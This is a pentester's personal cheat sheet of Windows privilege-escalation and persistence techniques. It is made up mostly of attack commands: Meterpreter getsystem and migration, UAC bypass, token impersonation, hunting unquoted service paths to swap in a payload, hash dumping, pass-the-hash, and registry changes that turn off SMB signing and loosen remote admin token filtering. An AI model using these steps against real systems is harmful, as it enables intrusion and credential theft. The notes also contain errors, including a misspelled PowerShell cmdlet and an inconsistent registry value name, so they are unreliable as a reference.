Privilege Escalation and Maintaining Access

NOTE: This is solely just commands that help me to refer back when I am doing a pentest. Nothing technical here.

Stable Shell:

For Windows, using meterpreter MIGRATE function to migrate the shell into other process
Better to have SYSTEM Priv . So that we can migrate to SYSTEM process
1. meterpreter: getsystem
2. meterpreter: getuid
3. UACme Bypass UAC- User Account Control
4. Winpeas.exe
5. PowerUp.ps1
6. check priv in cmd whoami /priv vs Meterpreter : run win_privs
Token Impersonation - Incognito, Juicy Potato, Rotten Potato.
1. Meterpreter : load incognito +
2. impersonate_token [user]
3. getuid

Find a service running as SYSTEM priv
1. wmic service get name,displayname,pathname,startmode | findstr /i 'auto' | findstr /i /v "c:\\windows\\\\" | findstr /i /v """
2. use trusted_service_path module in MSF.
Check the PATH, if it's unquoted.
1. sc qc [SERVICE]
Replace the payload.

dump the hash. - NOTE: you might need to obtain at least Administrator priv to dump the hashes.
pass the hash .psexec smbexec, wmiexec. Meterpreter. NOTE - sometimes local admin group is not enough, This is because typically presents itself when trying to pass-the-hash. which isn't an actual administrator (RID-500) rather, from an account that is in the Adwministrator group.
we might get error like STATUS_ACCESS_DENIED (Commands=117 WordCount=0) error, this is a good indication that registry changes may be required on the target machine.
HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System - ADD a new DWORD named LocalAccountTokenPolicy set value to 1.
HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\LanManServer\\Parameters - ADD a new DWORD named RequireSecuritySignature and set value to 0.
Set-ItemPropery -Path HKLM:\\software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System -Name LocalAccountTokenFilterPolicy -Value 1 -Type Dword
... same as above but for RequireSecuritySignature